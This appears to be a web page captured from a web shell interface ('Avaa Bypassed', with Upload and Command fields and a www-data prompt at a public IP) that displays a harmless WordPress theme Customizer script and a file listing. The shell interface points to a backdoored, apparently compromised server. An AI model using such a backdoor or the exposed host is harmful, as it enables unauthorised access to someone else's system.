[ Avaa Bypassed ]




Upload:

Command:

www-data@18.216.67.104: ~ $
/**
 * Live-update changed settings in real time in the Customizer preview.
 */

( function( $ ) {
		api = wp.customize;

	// Site title.
	api( 'blogname', function( value ) {
		value.bind( function( to ) {
			$( '.logo h1' ).text( to );
		} );
	} );

	// Site tagline.
	api( 'blogdescription', function( value ) {
		value.bind( function( to ) {
			$( '.logo span' ).text( to );
		} );
	} );
} )( jQuery );

Filemanager

Name Type Size Permission Actions
customize-preview.js File 426 B 0644
editable.js File 2.16 KB 0644
jquery.nivo.slider.js File 29.08 KB 0644